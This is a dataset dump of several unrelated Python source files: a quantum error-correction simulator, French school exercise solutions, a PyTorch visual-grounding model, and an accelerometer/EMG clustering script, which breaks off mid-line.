stab[i] == 'Z' and codeword[i] == '1':\n result *= -1 \n results.append(result)\n \n return results\n \n\n \ndef single_recovery_probability(recov_op, p):\n recoverydict = {}\n x = 0\n i = 0\n for r in recov_op:\n if r == 'X':\n x+=1\n elif r == 'I':\n i+=1\n prob = ((1-p)**i)*((p)**(x))\n\n return prob\n\n\ndef single_recovery_probability_func(recov_op):\n recoverydict = {}\n x = 0\n i = 0\n for r in recov_op:\n if r == 'X':\n x+=1\n elif r == 'I':\n i+=1\n prob = lambda p: ((1-p)**i)*((p)**(x))\n\n return prob\n\ndef get_initial(n):\n initial_states = ['0', '1']\n initial_logs = ['X', 'Z']\n initial_stabs = []\n for i in range(n-1):\n for j in range(len(initial_logs)):\n initial_logs[j] += 'I'\n for j in range(len(initial_states)):\n initial_states[j] += '0'\n initial_stabs.append('I'*n)\n for j in range(len(initial_logs)):\n initial_logs[j] += '+'\n count = 1\n for j in range(len(initial_stabs)):\n initial_stabs[j]= initial_stabs[j][:count] + 'Z' + initial_stabs[j][count+1:] + \"+\"\n count+=1\n return initial_states, initial_logs, initial_stabs\n\n\ndef get_error_table_values(error_table, p):\n error_table_values = []\n for error_row in error_table:\n error_table_values.append((error_row[0], error_row[1](p), error_row[2]))\n return error_table_values\n\ndef get_error_table(gates, n=3):\n # initial = ['000', '100']\n # log = ['XII+', 'ZII+']\n # stabs = ['IZI+', 'IIZ+']\n initial_states,initial_log, initial_stabs = get_initial(n)\n codewords = find_codewords(initial_states, gates)\n newlogs = evolve_operators(initial_log, gates)\n newstabilizers = evolve_operators(initial_stabs, gates)\n\n errors = construct_list_errors(n,n)\n error_table = []\n for error in errors:\n errorstate = apply_error(codewords[0], error)\n result = measure_stabilizers(newstabilizers, errorstate)\n prob = single_recovery_probability_func(error)\n error_table.append([error, prob, result])\n return error_table\n\ndef get_logical_error_probs(physical_error_probs, error_table):\n logical_error_probs = []\n for p in physical_error_probs:\n error_table_values = get_error_table_values(error_table, p)\n stabs_to_error_probs = {}\n for error_row_values in error_table_values:\n error_code = error_row_values[0]\n error_prob = error_row_values[1]\n error_stabs = tuple(error_row_values[2])\n if error_stabs not in stabs_to_error_probs:\n stabs_to_error_probs[error_stabs] = []\n\n stabs_to_error_probs[error_stabs].append(error_prob)\n logical_error_prob_value = 0\n for error_stabs in stabs_to_error_probs:\n logical_error_prob_value += sum(stabs_to_error_probs[error_stabs]) - max(stabs_to_error_probs[error_stabs])\n logical_error_probs.append(logical_error_prob_value)\n\n logical_error_probs = np.array(logical_error_probs)\n return logical_error_probs\n\ndef get_logical_error_probs_static(physical_error_probs, error_table, p_static=0.01):\n\n # calculating logical error lambda function\n error_table_values_static = get_error_table_values(error_table, p_static)\n stabs_to_error_probs = {}\n stabs_to_error_prob_functions = {}\n for j in range(len(error_table_values_static)):\n error_row_values = error_table_values_static[j]\n error_code = error_row_values[0]\n error_prob = error_row_values[1]\n error_stabs = tuple(error_row_values[2])\n error_prob_function = error_table[j][1]\n\n if error_stabs not in stabs_to_error_probs:\n stabs_to_error_probs[error_stabs] = []\n stabs_to_error_prob_functions[error_stabs] = []\n\n stabs_to_error_probs[error_stabs].append(error_prob)\n stabs_to_error_prob_functions[error_stabs].append(error_prob_function)\n \n highest_prob_function_list = []\n for error_stabs, error_probs in stabs_to_error_probs.items():\n most_probable_index = np.argmax(np.array(error_probs)) # returns index of highest probability\n highest_prob_function_list.append(stabs_to_error_prob_functions[error_stabs][most_probable_index])\n \n\n def get_logical_error_prob(p):\n prob_correct_error = 0\n for error_prob_function in highest_prob_function_list:\n prob_correct_error+=error_prob_function(p) # adding up probabilities of all errors that are correct\n logical_error_prob = 1 - prob_correct_error\n return logical_error_prob\n\n logical_error_probs = []\n for p in physical_error_probs:\n logical_error_probs.append(get_logical_error_prob(p))\n \n logical_error_probs = np.array(logical_error_probs)\n return logical_error_probs\n\ndef run_code_analysis(codes, static=False, p_static = 0.01):\n for code_name, code_info in codes.items():\n code_info[\"error_table\"] = get_error_table(code_info[\"gates\"], n=code_info[\"n\"])\n code_info[\"physical_error_probs\"] = np.linspace(0,1,101)\n if static:\n code_info[\"logical_error_probs\"] = get_logical_error_probs_static(code_info[\"physical_error_probs\"], code_info[\"error_table\"], p_static=p_static)\n else:\n code_info[\"logical_error_probs\"] = get_logical_error_probs(code_info[\"physical_error_probs\"], code_info[\"error_table\"])\n\ndef plot_analysis(codes):\n fig,ax = plt.subplots(1,1,dpi=200,figsize = (4,3))\n for code_name, code_info in codes.items():\n ax.plot(code_info[\"physical_error_probs\"],code_info[\"logical_error_probs\"], label=code_name )\n ax.legend(fontsize=6)\n ax.set_xlabel(\"Physical Error Rate (p)\")\n ax.set_ylabel(\"Logical Error Rate\")\n plt.plot()\n\ndef repetition_code_gates(d):\n gates = []\n for i in range(d-1):\n gates.append(('CX',(0,i+1)))\n return gates\n","repo_name":"snow-apple/random-qec","sub_path":"stabilizer.py","file_name":"stabilizer.py","file_ext":"py","file_size_in_byte":15661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42874966909","text":"# SUJET 13\n\n# Exo 1 :\ndef recherche(a, tab):\n occur = 0\n for element in tab :\n if a == element :\n occur += 1\n return occur\n\n# Appels de vérification :\nprint(recherche(5, []))\nprint(recherche(5, [-2, 3, 4, 8]))\nprint(recherche(5, [-2, 3, 1, 5, 3, 7, 4]))\nprint(recherche(5, [-2, 5, 3, 5, 4, 5]))\n\n# Exo 2 :\ndef rendu_monnaie(somme_due, somme_versee):\n pieces = [1, 2, 5, 10, 20, 50, 100, 200]\n rendu = []\n a_rendre = somme_versee - somme_due\n i = len(pieces) - 1\n while a_rendre > 0 :\n if pieces[i] <= a_rendre :\n rendu.append(pieces[i])\n a_rendre = a_rendre - pieces[i]\n else :\n i = i - 1\n return rendu\n\n# Appels de vérification :\nprint(rendu_monnaie(700,700))\nprint(rendu_monnaie(102,500))","repo_name":"4strium/Exos-BAC-NSI-2023","sub_path":"SUJET_13/SUJET_13_CORRECTION.py","file_name":"SUJET_13_CORRECTION.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37002105171","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as model_zoo\nfrom torch.utils.data import TensorDataset, DataLoader, SequentialSampler\nfrom torch.utils.data.distributed import DistributedSampler\n\nfrom .darknet import *\nfrom .convlstm import *\nfrom .modulation import *\n\nimport argparse\nimport collections\nimport logging\nimport json\nimport re\nimport time\nfrom tqdm import tqdm\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom pytorch_pretrained_bert.modeling import BertModel\n\n\ndef st_grid_calculation(st_relevance_score, word_id_st_sent2wordlist, bbox_st_list, word_id_st_sent, st_list_bbox2word, visu_scale, image_scale):\n batch_size = st_relevance_score.shape[0]\n dividend = image_scale // visu_scale\n activation_map = torch.zeros(batch_size, visu_scale, visu_scale, 1).cuda()\n for batch_i in range(batch_size):\n for ii in range(len(st_relevance_score[batch_i])):\n if not st_relevance_score[batch_i][ii] == 0:\n bbox_index = torch.nonzero(st_list_bbox2word[batch_i]==(word_id_st_sent2wordlist[batch_i][ii]+1))\n for jj in bbox_index:\n x1, y1, x2, y2 = bbox_st_list[batch_i][jj.item()]\n grid_xl = (x1 // dividend).int().item()\n grid_xr = min((x2 // dividend + 1).int().item(), visu_scale - 1)\n grid_yt = (y1 // dividend).int().item()\n grid_yb = min((y2 // dividend + 1).int().item(), visu_scale - 1)\n activation_map[batch_i, grid_yt:grid_yb, grid_xl:grid_xr] = st_relevance_score[batch_i][ii].item()\n # grid softmax\n for batch_i in range(batch_size):\n if not len(torch.nonzero(activation_map[batch_i])) == 0:\n tmp = activation_map[batch_i]\n tmp = tmp.reshape(-1, 1)\n tmp = F.softmax(tmp*9, dim=0)\n tmp = tmp.reshape(visu_scale, visu_scale, -1)\n activation_map[batch_i] = tmp\n return activation_map\n\n\ndef generate_coord(batch, height, width):\n xv, yv = torch.meshgrid([torch.arange(0,height), torch.arange(0,width)])\n xv_min = (xv.float()*2 - width)/width\n yv_min = (yv.float()*2 - height)/height\n xv_max = ((xv+1).float()*2 - width)/width\n yv_max = ((yv+1).float()*2 - height)/height\n xv_ctr = (xv_min+xv_max)/2\n yv_ctr = (yv_min+yv_max)/2\n hmap = torch.ones(height,width)*(1./height)\n wmap = torch.ones(height,width)*(1./width)\n coord = torch.autograd.Variable(torch.cat([xv_min.unsqueeze(0), yv_min.unsqueeze(0),\\\n xv_max.unsqueeze(0), yv_max.unsqueeze(0),\\\n xv_ctr.unsqueeze(0), yv_ctr.unsqueeze(0),\\\n hmap.unsqueeze(0), wmap.unsqueeze(0)], dim=0).cuda())\n coord = coord.unsqueeze(0).repeat(batch,1,1,1)\n return coord\n\n\nclass cross_attention_head(nn.Module):\n def __init__(self, emb_size=256, tunebert=False, convlstm=False, bert_model='bert-base-uncased', leaky=False, \\\n jemb_drop_out=0.1,raw_feature_norm='softmax',NCatt=2,down_sample_ith=2,fpn_n=3,sub_step=2,n_head=3):\n super(cross_attention_head, self).__init__()\n\n self.down_sample_ith = down_sample_ith\n self.fpn_n = fpn_n\n self.emb_size = emb_size\n self.NCatt = NCatt\n self.sub_step = sub_step\n self.tunebert = tunebert\n self.raw_feature_norm = raw_feature_norm\n if bert_model=='bert-base-uncased':\n self.textdim=768\n else:\n self.textdim=1024\n self.convlstm = convlstm\n ## Visual model\n self.visumodel = Darknet(config_path='./model/yolov3.cfg')\n self.visumodel.load_weights('./saved_models/yolov3.weights')\n ## Text model\n self.textmodel = BertModel.from_pretrained(bert_model)\n self.mapping_visu = ConvBatchNormReLU(256, emb_size, 1, 1, 0, 1, leaky=leaky)\n self.mapping_lang = torch.nn.Sequential(\n nn.Linear(self.textdim, emb_size),\n nn.ReLU(),\n nn.Dropout(jemb_drop_out),\n nn.Linear(emb_size, emb_size),\n nn.ReLU(),)\n self.txt_single_classifier = ConvBatchNormReLU(emb_size*2, 1, 1, 1, 0, 1, leaky=leaky)\n self.softmax = nn.Softmax()\n self.bn =nn.BatchNorm2d(emb_size)\n self.cross_att_modulesdict = nn.ModuleDict()\n output_emb = emb_size\n modules = OrderedDict()\n modules['convmerge0_1x1'] = ConvBatchNormReLU(emb_size * 2, emb_size, 1, 1, 0, 1)\n modules['convmerge1_1x1'] = ConvBatchNormReLU(emb_size * 2, emb_size, 1, 1, 0, 1)\n for i in range(fpn_n-1):\n modules['conv%d_downsample'%i] = torch.nn.Sequential(\n ConvBatchNormReLU(emb_size, emb_size, 1, 1, 0, 1),\n nn.MaxPool2d(2,2))\n modules['fcn'] = torch.nn.Sequential(\n ConvBatchNormReLU(output_emb*2, output_emb, 1, 1, 0, 1, leaky=leaky),\n nn.Conv2d(output_emb, 9*5, kernel_size=1))\n modules['fcn_sub'] = torch.nn.Sequential(\n ConvBatchNormReLU(output_emb*2, output_emb, 1, 1, 0, 1, leaky=leaky),\n nn.Conv2d(output_emb, 9*5, kernel_size=1))\n modules['fcn_2sub'] = torch.nn.Sequential(\n ConvBatchNormReLU(output_emb*2, output_emb, 1, 1, 0, 1, leaky=leaky),\n nn.Conv2d(output_emb, 9*5, kernel_size=1))\n kn = 0\n for _ in range(0,self.fpn_n):\n for _ in range(self.sub_step):\n modules['catt%d'%kn] = cross_att_blocked(raw_feature_norm=raw_feature_norm,head=n_head)\n modules['linear%d'%kn] = nn.Linear(1024,emb_size)\n modules['conv%d_1x1'%kn] = ConvBatchNormReLU(emb_size*2, emb_size, 1, 1, 0, 1)\n modules['conv%d_3x3'%kn] = ConvBatchNormReLU(emb_size, emb_size, 3, 1, 1, 1)\n kn += 1\n\n self.cross_att_modulesdict.update(modules)\n\n\n def forward(self, image, word_id, word_mask, word_st_position, bbox_st_list, word_id_st_sent, word_mask_st_sent, st_list_bbox2word):\n\n ## Visual Module\n batch_size = image.size(0)\n raw_fvisu = self.visumodel(image)\n if self.convlstm:\n raw_fvisu = raw_fvisu[1]\n else:\n raw_fvisu_8x8 = raw_fvisu[0]\n raw_fvisu_16x16 = raw_fvisu[1]\n raw_fvisu = raw_fvisu[2]\n\n ## Language Module for scene text\n all_encoder_layers_st_sent, _ = self.textmodel(word_id_st_sent, token_type_ids=None, attention_mask=word_mask_st_sent)\n raw_flang_st_sent = (all_encoder_layers_st_sent[-1][:, 0, :] + all_encoder_layers_st_sent[-2][:, 0, :] +\n all_encoder_layers_st_sent[-3][:, 0, :] + all_encoder_layers_st_sent[-4][:, 0, :]) / 4\n raw_fword_st_sent = (all_encoder_layers_st_sent[-1] + all_encoder_layers_st_sent[-2] +\n all_encoder_layers_st_sent[-3] + all_encoder_layers_st_sent[-4]) / 4\n if not self.tunebert:\n hidden_st_sent = raw_flang_st_sent.detach()\n raw_fword_st_sent = raw_fword_st_sent.detach()\n\n ## Language Module for expression\n all_encoder_layers, _ = self.textmodel(word_id, \\\n token_type_ids=None, attention_mask=word_mask)\n ## Sentence feature at the first position [cls]\n raw_flang = (all_encoder_layers[-1][:,0,:] + all_encoder_layers[-2][:,0,:]\\\n + all_encoder_layers[-3][:,0,:] + all_encoder_layers[-4][:,0,:])/4\n raw_fword = (all_encoder_layers[-1] + all_encoder_layers[-2]\\\n + all_encoder_layers[-3] + all_encoder_layers[-4])/4\n if not self.tunebert:\n ## fix bert during training\n # raw_flang = raw_flang.detach()\n hidden = raw_flang.detach()\n raw_fword = raw_fword.detach()\n\n ## Correlatd Text Extraction & Correlated Region Activation\n mask_word_att = torch.zeros_like(raw_fword).cuda()\n mask_st_att = torch.zeros_like(raw_fword_st_sent).cuda()\n for ii in range(batch_size):\n mask_word_att[ii, 1:len(torch.nonzero(word_mask[ii])) - 1, :] = 1\n mask_st_att[ii, 1:len(torch.nonzero(word_id_st_sent[ii])) - 1, :] = 1\n raw_fword_attn = raw_fword * mask_word_att\n raw_fword_st_sent = raw_fword_st_sent * mask_st_att\n st_relevance_score = torch.zeros(batch_size, mask_st_att.size(1), mask_word_att.size(1)).cuda()\n\n THRES_PHI = 0.50\n for ii in range(batch_size):\n st_relevance_score[ii] = F.cosine_similarity(raw_fword_st_sent[ii].unsqueeze(1), raw_fword_attn[ii], dim=-1)\n st_relevance_score = torch.max(st_relevance_score, dim=2, keepdim=True).values\n st_relevance_score = torch.where(st_relevance_score < THRES_PHI, torch.zeros_like(st_relevance_score), st_relevance_score)\n\n weighted_st_feature_8x8 = st_grid_calculation(st_relevance_score, word_st_position, bbox_st_list, word_id_st_sent, st_list_bbox2word, raw_fvisu_8x8.size(2), image.size(2))\n raw_fvisu_8x8 = raw_fvisu_8x8.permute(0,2,3,1).contiguous() * weighted_st_feature_8x8 + raw_fvisu_8x8.permute(0,2,3,1).contiguous()\n raw_fvisu_8x8 = raw_fvisu_8x8.permute(0,3,1,2).contiguous()\n\n weighted_st_feature_16x16 = st_grid_calculation(st_relevance_score, word_st_position, bbox_st_list, word_id_st_sent, st_list_bbox2word, raw_fvisu_16x16.size(2), image.size(2))\n raw_fvisu_16x16 = raw_fvisu_16x16.permute(0,2,3,1).contiguous() * weighted_st_feature_16x16 + raw_fvisu_16x16.permute(0,2,3,1).contiguous()\n raw_fvisu_16x16 = raw_fvisu_16x16.permute(0,3,1,2).contiguous()\n\n weighted_st_feature_32x32 = st_grid_calculation(st_relevance_score, word_st_position, bbox_st_list, word_id_st_sent, st_list_bbox2word, raw_fvisu.size(2),image.size(2))\n raw_fvisu = raw_fvisu.permute(0,2,3,1).contiguous() * weighted_st_feature_32x32 + raw_fvisu.permute(0,2,3,1).contiguous()\n raw_fvisu = raw_fvisu.permute(0,3,1,2).contiguous()\n\n ## Language Module - mapping language feature\n fword = Variable(torch.zeros(raw_fword.shape[0], raw_fword.shape[1], self.emb_size).cuda())\n for ii in range(raw_fword.shape[0]):\n ntoken = (word_mask[ii] != 0).sum()\n fword[ii, :ntoken, :] = F.normalize(self.mapping_lang(raw_fword[ii, :ntoken, :]), p=2, dim=1)\n raw_fword = fword\n global_raw_fword = raw_fword.mean(1)\n\n ## Visual Module - mapping visual feature & decomposition\n fvisu = self.mapping_visu(raw_fvisu)\n raw_fvisu = F.normalize(fvisu, p=2, dim=1) # 32x32\n raw_fvisu_16x16 = F.normalize(raw_fvisu_16x16, p=2, dim=1) # 16x16\n raw_fvisu_8x8 = raw_fvisu_8x8.view(batch_size, raw_fvisu_8x8.size(1), -1).transpose(1,2).contiguous()\n raw_fvisu_8x8 = F.max_pool1d(raw_fvisu_8x8, 2).transpose(1, 2).contiguous().view(batch_size, -1, 8, 8)\n raw_fvisu_8x8 = F.normalize(raw_fvisu_8x8, p=2, dim=1) # 8x8\n\n map_fvisu = raw_fvisu.view(batch_size, raw_fvisu.size(1), -1)\n map_fvisu_orig = torch.transpose(map_fvisu, 1, 2).contiguous()\n map_fvisu_16x16 = raw_fvisu_16x16.view(batch_size, raw_fvisu_16x16.size(1), -1)\n map_fvisu_16x16 = torch.transpose(map_fvisu_16x16, 1, 2).contiguous()\n map_fvisu_8x8 = raw_fvisu_8x8.view(batch_size, raw_fvisu_8x8.size(1), -1)\n map_fvisu_8x8 = torch.transpose(map_fvisu_8x8, 1, 2).contiguous()\n map_fvisu_orig_co = map_fvisu_orig.clone()\n\n ## Visual Module - location feature\n coord = generate_coord(batch_size, raw_fvisu.size(2), raw_fvisu.size(3))\n coord_16x16 = generate_coord(batch_size, raw_fvisu_16x16.size(2), raw_fvisu_16x16.size(3))\n coord_8x8 = generate_coord(batch_size, raw_fvisu_8x8.size(2), raw_fvisu_8x8.size(3))\n\n map_coord = coord.view(batch_size, coord.size(1), -1)\n map_coord = torch.transpose(map_coord, 1, 2).contiguous()\n map_coord_16x16 = coord_16x16.view(batch_size, coord_16x16.size(1), -1)\n map_coord_16x16 = torch.transpose(map_coord_16x16, 1, 2).contiguous()\n map_coord_8x8 = coord_8x8.view(batch_size, coord_8x8.size(1), -1)\n map_coord_8x8 = torch.transpose(map_coord_8x8, 1, 2).contiguous()\n\n ## Initialization for bottom-up and bidirectional fusion\n make_f = []\n make_target_visu = []\n make_target_txt = []\n out_feat = []\n cosine_weights = []\n contrast_visu = 0\n contrast_txt = 0\n cosine_txt_word, cosine_txt_visu = None, None\n map_fvisu_add = map_fvisu_orig\n map_coord_add = map_coord\n raw_fvisu_add = raw_fvisu\n out_visu = 0\n merge_t = 0\n att_n = 0\n\n for ff in range(self.fpn_n): # for multi-scale visual features\n for n in range(self.sub_step): # for multi-step alignment\n if ff != 0 or n != 0:\n out_visu = merge_f.view(batch_size, raw_fvisu.size(1), -1)\n out_visu = torch.transpose(out_visu, 1, 2).contiguous()\n out_visu, out_txt, cosine_txt_region, cosine_visu_region, cosine_txt_word, cosine_txt_visu = self.cross_att_modulesdict['catt%d'%att_n](out_visu+map_fvisu_add, merge_t+raw_fword, map_coord_add,cosine_txt_word, cosine_txt_visu, word_mask)\n\n out_visu = out_visu + global_raw_fword.unsqueeze(1)\n out_visu = torch.transpose(out_visu, 1, 2).contiguous()\n out_visu = out_visu.view(batch_size,raw_fvisu_add.size(1),raw_fvisu_add.size(2),raw_fvisu_add.size(3))\n merge_f = torch.cat([raw_fvisu_add+contrast_visu,out_visu],dim=1)\n merge_f = self.cross_att_modulesdict['conv%d_1x1'%att_n](merge_f)\n merge_f = self.cross_att_modulesdict['conv%d_3x3'%att_n](merge_f)\n merge_t = torch.cat([raw_fword+contrast_txt,out_txt],dim=-1)\n merge_t = self.cross_att_modulesdict['linear%d'%att_n](merge_t)\n make_target_visu.extend(cosine_visu_region)\n make_target_txt.extend(cosine_txt_region)\n make_f.append(merge_f)\n att_n += 1\n if ff == 0:\n max_feature_32x32 = torch.stack(make_f[:self.sub_step],-1).sum(-1)\n merge_f = self.cross_att_modulesdict['conv0_downsample'](max_feature_32x32)\n raw_fvisu_add = raw_fvisu_16x16\n map_fvisu_add = map_fvisu_16x16\n map_coord_add = map_coord_16x16\n\n elif ff == 1:\n max_feature_16x16 = torch.stack(make_f[self.sub_step:self.sub_step*(ff+1)],-1).sum(-1)\n merge_f = self.cross_att_modulesdict['conv1_downsample'](max_feature_16x16)\n raw_fvisu_add = raw_fvisu_8x8\n map_fvisu_add = map_fvisu_8x8\n map_coord_add = map_coord_8x8\n if ff == self.fpn_n - 1 and n == self.sub_step - 1:\n max_feature_8x8 = torch.stack(make_f[self.sub_step*ff:],-1).sum(-1)\n upsampling1 = nn.UpsamplingNearest2d(scale_factor=2)\n fpn_region_16x16 = upsampling1(max_feature_8x8)\n fpn_region_16x16 = torch.cat([max_feature_16x16, fpn_region_16x16], dim=1)\n fpn_region_16x16 = self.cross_att_modulesdict['convmerge0_1x1'](fpn_region_16x16)\n fpn_region_32x32 = upsampling1(fpn_region_16x16)\n fpn_region_32x32 = torch.cat([max_feature_32x32, fpn_region_32x32], dim=1)\n fpn_region_32x32 = self.cross_att_modulesdict['convmerge1_1x1'](fpn_region_32x32)\n\n out_region_32x32 = self.cross_att_modulesdict['fcn'](torch.cat([fpn_region_32x32, raw_fvisu], dim=1))\n out_region_16x16 = self.cross_att_modulesdict['fcn_sub'](torch.cat([fpn_region_16x16, raw_fvisu_16x16], dim=1))\n out_region_8x8 = self.cross_att_modulesdict['fcn_2sub'](torch.cat([max_feature_8x8, raw_fvisu_8x8], dim=1))\n\n single_conf = self.txt_single_classifier(torch.cat([max_feature_32x32,raw_fvisu],dim=1)).view(batch_size,map_fvisu_orig_co.size(1))\n single_conf_16 = self.txt_single_classifier(torch.cat([max_feature_16x16,raw_fvisu_16x16],dim=1)).view(batch_size,16*16)\n single_conf_8 = self.txt_single_classifier(torch.cat([max_feature_8x8,raw_fvisu_8x8],dim=1)).view(batch_size,8*8)\n out_feat.extend([out_region_32x32,out_region_16x16,out_region_8x8])\n cosine_weights.extend([make_target_visu,make_target_txt,word_mask,single_conf,single_conf_16,single_conf_8])\n\n return out_feat, cosine_weights\n\n\ndef cosine_similarity(x1, x2, dim=1, eps=1e-8):\n \"\"\"Returns cosine similarity between x1 and x2, computed along dim.\"\"\"\n w12 = torch.sum(x1 * x2, dim)\n w1 = torch.norm(x1, 2, dim)\n w2 = torch.norm(x2, 2, dim)\n return (w12 / (w1 * w2).clamp(min=eps))\n\n\ndef l2norm(X, dim, eps=1e-8):\n \"\"\"L2-normalize columns of X\n \"\"\"\n norm = torch.pow(X, 2).sum(dim=dim, keepdim=True).sqrt() + eps\n X = torch.div(X, norm)\n return X\n\n\ndef l1norm(X, dim, eps=1e-8):\n \"\"\"L1-normalize columns of X\n \"\"\"\n norm = torch.abs(X).sum(dim=dim, keepdim=True) + eps\n X = torch.div(X, norm)\n return X\n\n\ndef func_attention(query, context, raw_feature_norm, smooth=9, eps=1e-8, weight=None):\n \"\"\"\n query: (n_context, queryL, d)\n context: (n_context, sourceL, d)\n \"\"\"\n batch_size_q, queryL = query.size(0), query.size(1)\n batch_size, sourceL = context.size(0), context.size(1)\n\n\n # Get attention\n # --> (batch, d, queryL)\n queryT = torch.transpose(query, 1, 2)\n\n # (batch, sourceL, d)(batch, d, queryL)\n # --> (batch, sourceL, queryL)\n attn = torch.bmm(context, queryT)\n\n if raw_feature_norm == \"softmax\":\n # --> (batch*sourceL, queryL)\n attn = attn.view(batch_size*sourceL, queryL)\n attn = F.softmax(attn, dim=1)\n # --> (batch, sourceL, queryL)\n attn = attn.view(batch_size, sourceL, queryL)\n elif raw_feature_norm == \"l2norm\":\n attn = l2norm(attn, 2)\n elif raw_feature_norm == \"clipped_l2norm\":\n attn = nn.LeakyReLU(0.1)(attn)\n attn = l2norm(attn, 2)\n elif raw_feature_norm == \"l1norm\":\n attn = l1norm(attn, 2)\n elif raw_feature_norm == \"clipped_l1norm\":\n attn = nn.LeakyReLU(0.1)(attn)\n attn = l1norm(attn, 2)\n elif raw_feature_norm == \"clipped\":\n attn = nn.LeakyReLU(0.1)(attn)\n elif raw_feature_norm == \"no_norm\":\n pass\n else:\n raise ValueError(\"unknown first norm type:\", raw_feature_norm)\n\n if weight is not None:\n attn = attn + weight\n\n attn_out = attn.clone()\n\n # --> (batch, queryL, sourceL)\n attn = torch.transpose(attn, 1, 2).contiguous()\n # --> (batch*queryL, sourceL)\n attn = attn.view(batch_size*queryL, sourceL)\n\n attn = F.softmax(attn*smooth, dim=1)\n # --> (batch, queryL, sourceL)\n attn = attn.view(batch_size, queryL, sourceL)\n # --> (batch, sourceL, queryL)\n attnT = torch.transpose(attn, 1, 2).contiguous()\n\n # --> (batch, d, sourceL)\n contextT = torch.transpose(context, 1, 2)\n # (batch x d x sourceL)(batch x sourceL x queryL)\n # --> (batch, d, queryL)\n weightedContext = torch.bmm(contextT, attnT)\n # --> (batch, queryL, d)\n weightedContext = torch.transpose(weightedContext, 1, 2)\n\n return weightedContext, attn_out\n","repo_name":"Buki2/STAN","sub_path":"model/grounding_model.py","file_name":"grounding_model.py","file_ext":"py","file_size_in_byte":19292,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"36789678493","text":"import matplotlib.pyplot as plt\n# ^^^ pyforest auto-imports - don't write above this line\nimport scipy.io\nimport pandas as pd\nimport preprocessing_helper\nimport feature_extraction\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.decomposition import PCA\n\ndirectory_validation = 'D:\\\\Work\\\\Oxford\\\\Data\\\\TIM\\\\'\ndirectory_acc = 'D:\\\\Work\\\\Oxford\\\\Data\\\\ACC\\\\'\ndirectory_emg = 'D:\\\\Work\\\\Oxford\\\\Data\\\\EMG\\\\'\n\nsampling_rate=1000\n\n\n# In[4]:\n\n#Here for having overlapping regions do sliding = True. And if you want to have 4 sec sliding then seconds = 1\ninput_acc, envelope_acc, instantaneous_freq = preprocessing_helper.ThreeAxisACC(directory_acc,sampling_rate,sliding=False,seconds=1)\ninput_emg, envelope_emg = preprocessing_helper.ThreeAxisEMG(directory_emg,sampling_rate,sliding=False,seconds=1)\n\n\n# In[6]:\n\n#incase you want to save the dataset\n\"\"\"np.save(\"accS\",arr = np.array(input_acc))\nnp.save(\"acc_envelopeS\",arr = np.array(envelope_acc))\nnp.save(\"acc_instantaneous_freqS\",arr = np.array(instantaneous_freq))\nnp.save(\"emgS\",arr = np.array(input_emg))\nnp.save(\"emg_envelopeS\",arr = np.array(envelope_emg))\"\"\"\n#sys.modules[__name__].__dict__.clear()\n\n\n# In[9]:\n\n#Calculating FEATURES\nacc_feature_withoutenvelope = feature_extraction.featureACC(np.array(input_acc),cover= False,sampling_rate=sampling_rate)\nacc_feature_withenvelope = feature_extraction.featureACC(np.array(envelope_acc),cover= True,sampling_rate=sampling_rate)\nTSI = feature_extraction.TSI_feature(np.array(instantaneous_freq))\nTSI = np.expand_dims(TSI, axis=2)\nemg_feature_withoutenvelope = feature_extraction.featureEMG(np.array(input_emg),cover= True,sampling_rate=sampling_rate)\nemg_feature_withenvelope = feature_extraction.featureEMG(np.array(envelope_emg),cover= False,sampling_rate=sampling_rate)\n\n# In[14]:\n\nprint(acc_feature_withoutenvelope.shape)\nprint(acc_feature_withenvelope.shape)\nprint(TSI.shape)\nprint(emg_feature_withoutenvelope.shape)\nprint(emg_feature_withenvelope.shape)\n\n# In[15]:\n\ndata_temp = np.concatenate((acc_feature_withoutenvelope, acc_feature_withenvelope, TSI,emg_feature_withoutenvelope,emg_feature_withenvelope), axis=2)\nprint(data_temp.shape)\nprint(data_temp.shape[0])#patient\nprint(data_temp.shape[1])#axis\nprint(data_temp.shape[2])#features\nprint(data_temp.shape[3])#instances\n\n#Z-Normalization\nfor i in range(data_temp.shape[2]):\n data_temp[:,:,i,:] = (data_temp[:,:,i,:] - data_temp[:,:,i,:].mean())/data_temp[:,:,i,:].std()\n#Checking\nprint(data_temp[:,:,0,:].mean())\nprint(data_temp[:,:,0,:].std())\n\n# In[21]:\n\nprint(data_temp.shape)\n#now have to convert into shape=(instances x features)\nprint(data_temp.shape[0]*data_temp.shape[1]*data_temp.shape[3])\n\nneu = preprocessing_helper.AllPersonAllaxis(data_temp)\nprint(neu.shape)\ndef show_data(X):\n plt.plot(X)#,\"r.\")\n #plt.plot(a)\n plt.ylabel(\"Data values\")\n plt.xlabel(\"Instances\")\n plt.show()\nshow_data(neu)\n\n# In[23]:\n\n#Finding optimal parameters for clustering\nn_clusters = preprocessing_helper.optimal_cluster_value(neu)\neps_finalVal = preprocessing.optimal_eps_value(neu,n_clusters)\nfinal_cluster = preprocessing_helper.DB_cluster(neu,eps_finalVal,n_clusters)\n\n# In[30]:\n\nclustering = DBSCAN(eps=eps_finalVal, min_samples=final_cluster).fit(neu)\ncluster=clustering.labels_\nprint(len(set(cluster)))\nunique, counts = np.unique(cluster, return_counts=True)\ndict(zip(unique, counts))\n\n\n# In[32]:\n\n\n\"\"\"def show_clusters(X,cluster):\n df=pd.DataFrame(dict(x=X[:,0],y=X[:,1], label=cluster))\n colors = {-1:'red',0:'blue',1:'orange',2:'green',3:'skyblue',4:'black'}\n fig,ax=plt.subplots(figsize=(8,8))\n grouped = df.groupby('label')\n \n for key, group in grouped:\n group.plot(ax=ax, kind='scatter',x='x',y='y',label=key ,color=colors[key])\n plt.xlabel(\"feature 0\")\n plt.ylabel(\"feature 1\")\n plt.show()\nshow_clusters(neu,cluster)\"\"\"\n\n\n# In[35]:\n\n#PCA for plotting\n# as PCA maximizes variance so normalization is a must\npca = PCA(.95)\n#pca= PCA(n_components=2)\npca.fit(neu)#shape (n_samples, n_features)\ntrain_img = pca.transform(neu)\n\n# In[34]:\n\nprint(train_img.shape)\nprint(pca.components_.shape)\n\n#Variance and important components\nprint(pca.explained_variance_ratio_)\nn_pcs= 